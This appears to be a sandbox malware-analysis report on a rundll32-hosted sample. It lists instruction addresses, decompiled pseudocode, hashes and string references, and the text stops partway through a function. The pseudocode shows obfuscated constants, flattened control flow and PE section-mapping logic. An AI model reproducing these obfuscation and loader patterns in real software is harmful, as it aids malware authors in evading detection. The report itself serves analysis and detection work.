0x0035e0e8
0x0035e0ee
0x0035e153
0x0035e155
0x0035e158
0x00000000
0x0035e0f0
0x0035e0f6
0x0035e1bd
0x0035e0fc
0x0035e102
0x0035e13c
0x0035e13d
0x0035e13e
0x0035e143
0x0035e147
0x0035e149
0x0035e14b
0x00000000
0x0035e14b
0x0035e104
0x0035e106
0x00000000
0x0035e10c
0x0035e11e
0x0035e123
0x0035e126
0x00000000
0x0035e126
0x0035e106
0x0035e102
0x0035e0f6
0x0035e0ee
0x0035e1c5
0x0035e1c7
0x0035e1cc
0x0035e1cc
0x0035e1d3
0x0035e1d3
0x0035e18f
0x0035e192
0x0035e197
0x0035e197
0x0035e197
0x00000000

Strings

d<, xrefs: 0035E089
Wp, xrefs: 0035E0A1
g, xrefs: 0035E01E

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: d<$g$Wp
API String ID: 0-355099142
Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
Instruction ID: 1c381a2edcdee9d79915ea9aa700d727c468c17c3f045a64e7fa814ef1643dea
Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
Instruction Fuzzy Hash: EB7141B10093419FC769CF61C58982BBBF1FBC9748F10891DF69A96260D3B69A09CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0035C3A0 Relevance: 3.9, Strings: 3, Instructions: 150
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0035C3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t137;
				void* _t149;
				void* _t159;
				void* _t161;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t188;
				void* _t193;
				intOrPtr* _t195;
				signed int* _t197;
				signed int* _t198;
				signed int* _t199;

				_push(_a16);
				_t195 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t137);
				_v4 = _v4 & 0x00000000;
				_v12 = 0x8437e8;
				_v8 = 0xdb9720;
				_v60 = 0xf5e956;
				_v60 = _v60 << 0xc;
				_t163 = 0x6b;
				_v60 = _v60 / _t163;
				_v60 = _v60 | 0x488cc8ef;
				_v60 = _v60 ^ 0x48eedbff;
				_v44 = 0x82c5a5;
				_v44 = _v44 | 0x04b6a6f1;
				_t164 = 0x4a;
				_v44 = _v44 * 0x6a;
				_v44 = _v44 ^ 0xf3bc2b72;
				_v40 = 0x882fad;
				_v40 = _v40 ^ 0x709d76bd;
				_v40 = _v40 + 0xffff52d2;
				_v40 = _v40 ^ 0x7014aba2;
				_v28 = 0x22e756;
				_v28 = _v28 + 0x769a;
				_v28 = _v28 ^ 0x002bcc4a;
				_v64 = 0xc290d0;
				_v64 = _v64 + 0xffff641a;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xbd78a131;
				_v64 = _v64 ^ 0x83ed8c94;
				_v32 = 0x78b1b0;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x2c621b2d;
				_v36 = 0xa1b61f;
				_v36 = _v36 + 0xb017;
				_v36 = _v36 | 0xc1836c3e;
				_v36 = _v36 ^ 0xc1a0ee75;
				_v56 = 0x2861cb;
				_v56 = _v56 / _t164;
				_v56 = _v56 << 0xd;
				_t165 = 0x1b;
				_v56 = _v56 / _t165;
				_v56 = _v56 ^ 0x00aa9f16;
				_v24 = 0x4a8582;
				_v24 = _v24 | 0x39704e96;
				_v24 = _v24 ^ 0x397cf0ca;
				_v52 = 0x9fdf3f;
				_v52 = _v52 | 0x733ecb9c;
				_v52 = _v52 >> 0x10;
				_t166 = 0x2c;
				_v52 = _v52 / _t166;
				_v52 = _v52 ^ 0x0002453b;
				_v20 = 0x70cd9;
				_v20 = _v20 ^ 0x0384d77a;
				_v20 = _v20 ^ 0x03811849;
				_v16 = 0x6ca56e;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 ^ 0x0be055d0;
				_v48 = 0x383b50;
				_v48 = _v48 + 0xe78c;
				_v48 = _v48 + 0x7960;
				_v48 = _v48 + 0xffff251b;
				_v48 = _v48 ^ 0x003eca00;
				_t167 = _v28;
				_t149 = E0034474F(_t167, __ecx, _v64, _v32);
				_t159 = _t149;
				_t197 =  &(( &_v64)[8]);
				if(_t159 != 0) {
					_push(_t167);
					_t188 = E0034A3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
					_t198 =  &(_t197[5]);
					if(_t188 == 0) {
						L6:
						return _t188;
					}
					E0034ED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
					_t199 =  &(_t198[3]);
					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
					while(_t193 < _t161) {
						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
						E0034ED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
						_t199 =  &(_t199[3]);
						_t193 = _t193 + 0x28;
					}
					goto L6;
				}
				return _t149;
			}

0x0035c3a5
0x0035c3a9
0x0035c3ab
0x0035c3ad
0x0035c3b1
0x0035c3b5
0x0035c3b6
0x0035c3b7
0x0035c3bc
0x0035c3c3
0x0035c3cb
0x0035c3d3
0x0035c3db
0x0035c3e6
0x0035c3eb
0x0035c3f1
0x0035c3f9
0x0035c401
0x0035c409
0x0035c416
0x0035c419
0x0035c41d
0x0035c425
0x0035c42d
0x0035c435
0x0035c43d
0x0035c445
0x0035c44d
0x0035c455
0x0035c45d
0x0035c465
0x0035c46d
0x0035c472
0x0035c47a
0x0035c482
0x0035c48a
0x0035c48f
0x0035c497
0x0035c49f
0x0035c4a7
0x0035c4af
0x0035c4b7
0x0035c4c7
0x0035c4cb
0x0035c4d4
0x0035c4d9
0x0035c4df
0x0035c4e7
0x0035c4ef
0x0035c4f7
0x0035c4ff
0x0035c507
0x0035c50f
0x0035c518
0x0035c51b
0x0035c51f
0x0035c527
0x0035c52f
0x0035c537
0x0035c53f
0x0035c54c
0x0035c550
0x0035c55a
0x0035c562
0x0035c56a
0x0035c572
0x0035c57a
0x0035c58a
0x0035c58e
0x0035c593
0x0035c595
0x0035c59a
0x0035c5a9
0x0035c5c3
0x0035c5c5
0x0035c5ca
0x0035c628
0x00000000
0x0035c62a
0x0035c5dd
0x0035c5e6
0x0035c5f0
0x0035c5f5
0x0035c623
0x0035c60a
0x0035c618
0x0035c61d
0x0035c620
0x0035c620
0x00000000
0x0035c627
0x0035c630

Strings

P;8, xrefs: 0035C55A
`y, xrefs: 0035C56A
V", xrefs: 0035C445

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: P;8$V"$`y
API String ID: 0-4109183828
Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
Instruction ID: 3344f5314e17099ab76ae2ceb1e3111787ba4df4a996783cca55733d6ae0d4c7
Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
Instruction Fuzzy Hash: 796135715183409FC354CF66C88991BBBF1FBC9718F108A1CFA9A9A260D7B6D9198F06

Uniqueness

Uniqueness Score: -1.00%

Function 00341A56 Relevance: 3.9, Strings: 3, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00341A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t86;
				void* _t100;
				void* _t101;
				void* _t103;
				void* _t115;
				void* _t116;
				signed int _t117;
				void* _t119;
				void* _t120;

				_push(_a8);
				_t115 = __edx;
				_t101 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t86);
				_v72 = 0xccde8a;
				_t120 = _t119 + 0x10;
				_v72 = _v72 | 0xfb673ead;
				_v72 = _v72 + 0xedb6;
				_t116 = 0;
				_v72 = _v72 + 0xffff76c0;
				_t103 = 0x3303944;
				_v72 = _v72 ^ 0xfbf43e98;
				_v48 = 0xd56f6c;
				_v48 = _v48 ^ 0x96c3cc23;
				_v48 = _v48 ^ 0x96174539;
				_v76 = 0xdcf6fd;
				_v76 = _v76 + 0xffffee01;
				_t117 = 0x65;
				_v76 = _v76 * 0x23;
				_v76 = _v76 + 0xffff4e11;
				_v76 = _v76 ^ 0x1e3c7761;
				_v80 = 0x144f78;
				_v80 = _v80 * 0x39;
				_v80 = _v80 ^ 0xe273dc44;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x073b5be1;
				_v52 = 0xb4a3bb;
				_v52 = _v52 ^ 0x916b14c7;
				_v52 = _v52 ^ 0x91dd676b;
				_v68 = 0x8d73f0;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 * 0x1c;
				_v68 = _v68 ^ 0x0000c864;
				_v56 = 0xe6cb06;
				_v56 = _v56 >> 4;
				_v56 = _v56 | 0x1af2f565;
				_v56 = _v56 ^ 0x1af384df;
				_v60 = 0x4f2325;
				_t55 =  &_v60; // 0x4f2325
				_v60 =  *_t55 * 0x78;
				_t57 =  &_v60; // 0x4f2325
				_v60 =  *_t57 / _t117;
				_v60 = _v60 ^ 0x0059a097;
				_v64 = 0xa290a2;
				_v64 = _v64 >> 4;
				_v64 = _v64 + 0x6f89;
				_v64 = _v64 ^ 0x00044b6b;
				while(_t103 != 0x3303944) {
					if(_t103 == 0x5a97fa2) {
						__eflags = E0035D97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
						_t116 =  !=  ? 1 : _t116;
					} else {
						if(_t103 == 0xa5a4144) {
							E00343DBC( &_v44, _t101, _v72, _v48, _v76);
							_t120 = _t120 + 0xc;
							_t103 = 0xf0cd209;
							continue;
						} else {
							if(_t103 != 0xf0cd209) {
								L9:
								__eflags = _t103 - 0x1b06c67;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_t100 = E00342A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
								_t120 = _t120 + 0xc;
								if(_t100 != 0) {
									_t103 = 0x5a97fa2;
									continue;
								}
							}
						}
					}
					return _t116;
				}
				_t103 = 0xa5a4144;
				goto L9;
			}

0x00341a5d
0x00341a61
0x00341a63
0x00341a65
0x00341a69
0x00341a6a
0x00341a6b
0x00341a70
0x00341a78
0x00341a7b
0x00341a85
0x00341a8d
0x00341a8f
0x00341a97
0x00341a9c
0x00341aa4
0x00341aac
0x00341ab4
0x00341abc
0x00341ac4
0x00341ad3
0x00341ad4
0x00341ad8
0x00341ae0
0x00341ae8
0x00341af5
0x00341af9
0x00341b01
0x00341b06
0x00341b0e
0x00341b16
0x00341b1e
0x00341b26
0x00341b2e
0x00341b38
0x00341b3c
0x00341b44
0x00341b4c
0x00341b51
0x00341b59
0x00341b61
0x00341b69
0x00341b6e
0x00341b72
0x00341b7d
0x00341b81
0x00341b89
0x00341b91
0x00341b96
0x00341b9e
0x00341ba6
0x00341bb0
0x00341c36
0x00341c38
0x00341bb2
0x00341bb8
0x00341bf9
0x00341bfe
0x00341c01
0x00000000
0x00341bba
0x00341bc0
0x00341c0d
0x00341c0d
0x00341c13
0x00000000
0x00000000
0x00341c15
0x00341bc2
0x00341bd7
0x00341bdc
0x00341be1
0x00341be3
0x00000000
0x00341be3
0x00341be1
0x00341bc0
0x00341bb8
0x00341c44
0x00341c44
0x00341c08
0x00000000

Strings

%#O, xrefs: 00341B69
DAZ, xrefs: 00341BB2
DAZ, xrefs: 00341C08

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %#O$DAZ$DAZ
API String ID: 0-2081751441
Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
Instruction ID: b28d80cd30a5b10dc718b598f7385bda7d62dfeefa52175c6238e769877ea1d4
Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
Instruction Fuzzy Hash: 8E5174725083019FC759CF25D98A82FBBE1FBD8748F500A2DF586A6220D375DA498F87

Uniqueness

Uniqueness Score: -1.00%

Function 00360C14 Relevance: 3.9, Strings: 3, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00360C14(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t111;
				void* _t115;
				void* _t116;
				signed int _t118;
				void* _t124;
				void* _t125;
				signed int* _t127;

				_t127 =  &_v44;
				_t116 = __ecx;
				_v24 = 0x2b1199;
				_v24 = _v24 + 0x4ba2;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0xad737bf1;
				_v44 = 0xc9a4fe;
				_v44 = _v44 << 0xe;
				_v44 = _v44 | 0xe69540e1;
				_v44 = _v44 + 0xffffff88;
				_v44 = _v44 ^ 0xefbb2da7;
				_v28 = 0xedc73;
				_v28 = _v28 + 0xffff2701;
				_v28 = _v28 + 0x8bbf;
				_v28 = _v28 ^ 0x00055e2c;
				_v16 = 0xf95115;
				_v16 = _v16 | 0x79ce56df;
				_v16 = _v16 + 0xffff5817;
				_v16 = _v16 ^ 0x79f40a5c;
				_v36 = 0x520750;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x4f263ebd;
				_v36 = _v36 * 6;
				_v36 = _v36 ^ 0x64ef8369;
				_t124 = 0;
				_v40 = 0xccfebc;
				_t125 = 0x2aa38ff;
				_v40 = _v40 + 0xbaf7;
				_t118 = 0xd;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 + 0x6a66;
				_v40 = _v40 ^ 0x4b80704d;
				_v20 = 0xba2b89;
				_v20 = _v20 + 0xa093;
				_v20 = _v20 / _t118;
				_v20 = _v20 ^ 0x000a03fd;
				_v32 = 0xb0f3b0;
				_v32 = _v32 + 0x50dc;
				_v32 = _v32 + 0xffff1629;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0x35b73aee;
				_v4 = 0x432383;
				_v4 = _v4 + 0xffff373f;
				_v4 = _v4 | 0x7532efd9;
				_v4 = _v4 ^ 0x75785e39;
				_v8 = 0x709bec;
				_v8 = _v8 + 0xffffb2bc;
				_v8 = _v8 + 0xffff08e7;
				_v8 = _v8 ^ 0x006dec69;
				_v12 = 0xe79dac;
				_v12 = _v12 * 0x78;
				_v12 = _v12 + 0xb337;
				_v12 = _v12 ^ 0x6c9daebe;
				do {
					while(_t125 != 0x2aa38ff) {
						if(_t125 == 0x81ec960) {
							_t124 = _t124 + E0035C2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
						} else {
							if(_t125 == 0xa7224d4) {
								_t118 = _v16;
								_t111 = E0035C2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
								_t127 =  &(_t127[3]);
								_t125 = 0x81ec960;
								_t124 = _t124 + _t111;
								continue;
							} else {
								if(_t125 != 0xcb4deb0) {
									goto L8;
								} else {
									_push(_t118);
									_push(_t118);
									_t115 = E0034474B();
									_t127 =  &(_t127[2]);
									_t125 = 0xa7224d4;
									_t124 = _t124 + _t115;
									continue;
								}
							}
						}
						L11:
						return _t124;
					}
					_t125 = 0xcb4deb0;
					L8:
				} while (_t125 != 0x4501b46);
				goto L11;
			}

0x00360c14
0x00360c1b
0x00360c1d
0x00360c27
0x00360c2f
0x00360c34
0x00360c3c
0x00360c44
0x00360c49
0x00360c51
0x00360c56
0x00360c5e
0x00360c66
0x00360c6e
0x00360c76
0x00360c7e
0x00360c86
0x00360c8e
0x00360c96
0x00360c9e
0x00360ca6
0x00360cab
0x00360cb8
0x00360cbc
0x00360cc4
0x00360cc6
0x00360cce
0x00360cd3
0x00360ce7
0x00360ce8
0x00360cec
0x00360cf4
0x00360cfc
0x00360d04
0x00360d12
0x00360d16
0x00360d1e
0x00360d26
0x00360d2e
0x00360d3b
0x00360d3f
0x00360d47
0x00360d4f
0x00360d57
0x00360d5f
0x00360d67
0x00360d6f
0x00360d77
0x00360d7f
0x00360d87
0x00360d94
0x00360d98
0x00360da0
0x00360da8
0x00360da8
0x00360db6
0x00360e2e
0x00360db8
0x00360dbe
0x00360df2
0x00360df6
0x00360dfb
0x00360dfe
0x00360e03
0x00000000
0x00360dc0
0x00360dc2
0x00000000
0x00360dc4
0x00360dd0
0x00360dd1
0x00360dd2
0x00360dd7
0x00360dda
0x00360ddf
0x00000000
0x00360ddf
0x00360dc2
0x00360dbe
0x00360e30
0x00360e39
0x00360e39
0x00360e07
0x00360e09
0x00360e09
0x00000000

Strings

fj, xrefs: 00360CEC
9^xu, xrefs: 00360D5F
im, xrefs: 00360D7F

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 9^xu$fj$im
API String ID: 0-3261451082
Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
Instruction ID: c249bb8a98fb4a1a7157f921ac8967ac4043b4782531f56d5c2216623aa1a208
Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
Instruction Fuzzy Hash: 065136B24083429FC788CF25D88640BBBE0BFD8368F515A1DF495A6260D3B5CA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00349B83 Relevance: 3.9, Strings: 3, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00349B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _v64;
				intOrPtr _v68;
				void* _t115;
				signed int _t130;
				signed int _t131;
				void* _t133;

				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(_a4);
				_push(0x104);
				_push(__ecx);
				E003520B9(0x104);
				_v68 = 0x342964;
				asm("stosd");
				_t133 = 0;
				asm("stosd");
				asm("stosd");
				_v40 = 0xa3a3c;
				_v40 = _v40 + 0x2c25;
				_v40 = _v40 ^ 0x000a7661;
				_v16 = 0x75ee44;
				_t130 = 0x7a;
				_v16 = _v16 / _t130;
				_v16 = _v16 ^ 0xc9e42672;
				_v16 = _v16 ^ 0xc9e58a7e;
				_v8 = 0x386b92;
				_v8 = _v8 << 4;
				_v8 = _v8 | 0x0ec9a536;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x000b4478;
				_v44 = 0xd66787;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x001d593f;
				_v24 = 0x7c5a73;
				_v24 = _v24 | 0xae316990;
				_t131 = 0x19;
				_v24 = _v24 / _t131;
				_v24 = _v24 ^ 0x06f0967a;
				_v20 = 0x3dfd52;
				_v20 = _v20 >> 8;
				_v20 = _v20 * 0x24;
				_v20 = _v20 ^ 0x0009affd;
				_v12 = 0xf0c6a5;
				_v12 = _v12 + 0xffff2be4;
				_v12 = _v12 + 0x1686;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x03c3840c;
				_v48 = 0x30c967;
				_v48 = _v48 | 0xcae095b2;
				_v48 = _v48 ^ 0xcaf7f966;
				_v36 = 0xabcbdc;
				_v36 = _v36 + 0xfffff856;
				_v36 = _v36 | 0xb2b71321;
				_v36 = _v36 ^ 0xb2b3c312;
				_v32 = 0xda8dbe;
				_v32 = _v32 + 0xffff364b;
				_v32 = _v32 | 0x02598b37;
				_v32 = _v32 ^ 0x02d31c0a;
				_v28 = 0x528ee8;
				_v28 = _v28 * 0x12;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x17383776;
				_t115 = E003491DD(__ecx, _v40, __ecx);
				_t132 = _t115;
				if(_t115 != 0) {
					_t133 = E003476AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
					E00351E67(_v48, _v36, _v32, _v28, _t132);
				}
				return _t133;
			}

0x00349b8b
0x00349b93
0x00349b96
0x00349b99
0x00349b9c
0x00349b9f
0x00349ba0
0x00349ba1
0x00349ba6
0x00349bb4
0x00349bb5
0x00349bb9
0x00349bba
0x00349bbb
0x00349bc2
0x00349bc9
0x00349bd0
0x00349bda
0x00349bdf
0x00349be4
0x00349beb
0x00349bf2
0x00349bf9
0x00349bfd
0x00349c04
0x00349c08
0x00349c0f
0x00349c16
0x00349c1a
0x00349c21
0x00349c28
0x00349c32
0x00349c38
0x00349c3b
0x00349c42
0x00349c49
0x00349c52
0x00349c55
0x00349c5c
0x00349c63
0x00349c6a
0x00349c71
0x00349c75
0x00349c7c
0x00349c83
0x00349c8a
0x00349c91
0x00349c98
0x00349c9f
0x00349ca6
0x00349cad
0x00349cb4
0x00349cbb
0x00349cc2
0x00349cc9
0x00349cd4
0x00349cd7
0x00349cdb
0x00349ceb
0x00349cf3
0x00349cf7
0x00349d16
0x00349d21
0x00349d26
0x00349d30

Strings

Du, xrefs: 00349BD0
av, xrefs: 00349BC9
sZ|, xrefs: 00349C21

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Du$av$sZ|
API String ID: 0-3795359321
Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
Instruction ID: 1f00e2edfbd0af05e9a5f5a229eb5b6397d4c8d05f16075e0a50e2d09bc2e536
Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
Instruction Fuzzy Hash: 005113B1D00209EBDF09DFE5C94A8EEBBB1FB48318F108159E811BA260D3755A58DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1003B8BC Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

__decode_pointer.LIBCMT ref: 1003B8CA

Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2

SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Value$ExceptionFilterUnhandled__decode_pointer
String ID:
API String ID: 1958600898-0
Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323

Uniqueness

Uniqueness Score: -1.00%

Function 00351889 Relevance: 2.8, Strings: 2, Instructions: 278
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00351889(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				short _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _t323;
				signed int _t334;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				void* _t386;
				void* _t387;
				signed int* _t390;

				_t390 =  &_v1680;
				_v1568 = 0xdfec4c;
				_t386 = __ecx;
				_v1564 = 0;
				_t387 = 0xea1969c;
				_v1596 = 0xb94d4f;
				_v1596 = _v1596 >> 2;
				_v1596 = _v1596 ^ 0x002b88ba;
				_v1604 = 0x7820e8;
				_t9 =  &_v1604; // 0x7820e8
				_t337 = 0x3f;
				_v1604 =  *_t9 / _t337;
				_v1604 = _v1604 << 6;
				_v1604 = _v1604 ^ 0x0075b154;
				_v1676 = 0xd796f6;
				_v1676 = _v1676 << 7;
				_t338 = 0x1f;
				_v1676 = _v1676 / _t338;
				_v1676 = _v1676 | 0x34dfec15;
				_v1676 = _v1676 ^ 0x37fcd475;
				_v1580 = 0x701ced;
				_t339 = 0x3b;
				_v1580 = _v1580 / _t339;
				_v1580 = _v1580 ^ 0x000eda5b;
				_v1584 = 0x3864f;
				_v1584 = _v1584 | 0xebab6106;
				_v1584 = _v1584 ^ 0xeba3c8dc;
				_v1668 = 0x7d6229;
				_v1668 = _v1668 + 0x90f9;
				_t340 = 0x7d;
				_v1668 = _v1668 * 0xd;
				_v1668 = _v1668 + 0x17d6;
				_v1668 = _v1668 ^ 0x06671cb6;
				_v1652 = 0x8dafad;
				_v1652 = _v1652 + 0xffffa237;
				_v1652 = _v1652 / _t340;
				_v1652 = _v1652 ^ 0xeab94c45;
				_v1652 = _v1652 ^ 0xeabb4144;
				_v1620 = 0x364acf;
				_v1620 = _v1620 + 0xffffd559;
				_v1620 = _v1620 ^ 0x476b0832;
				_v1620 = _v1620 ^ 0x4757dcec;
				_v1660 = 0xdffac8;
				_v1660 = _v1660 | 0xd3f81aab;
				_t341 = 0xd;
				_v1660 = _v1660 / _t341;
				_v1660 = _v1660 + 0x2ca8;
				_v1660 = _v1660 ^ 0x10473906;
				_v1636 = 0xafa95;
				_v1636 = _v1636 | 0x12b9adda;
				_v1636 = _v1636 + 0xca30;
				_t342 = 0x24;
				_v1636 = _v1636 / _t342;
				_v1636 = _v1636 ^ 0x008bc8e6;
				_v1612 = 0xa1b06d;
				_v1612 = _v1612 ^ 0xd927b519;
				_t334 = 0x1c;
				_v1612 = _v1612 / _t334;
				_v1612 = _v1612 ^ 0x07c55aff;
				_v1628 = 0xe475d7;
				_v1628 = _v1628 + 0xf351;
				_v1628 = _v1628 >> 9;
				_v1628 = _v1628 ^ 0x000b149a;
				_v1644 = 0xc98f78;
				_v1644 = _v1644 + 0xa497;
				_v1644 = _v1644 + 0xab0a;
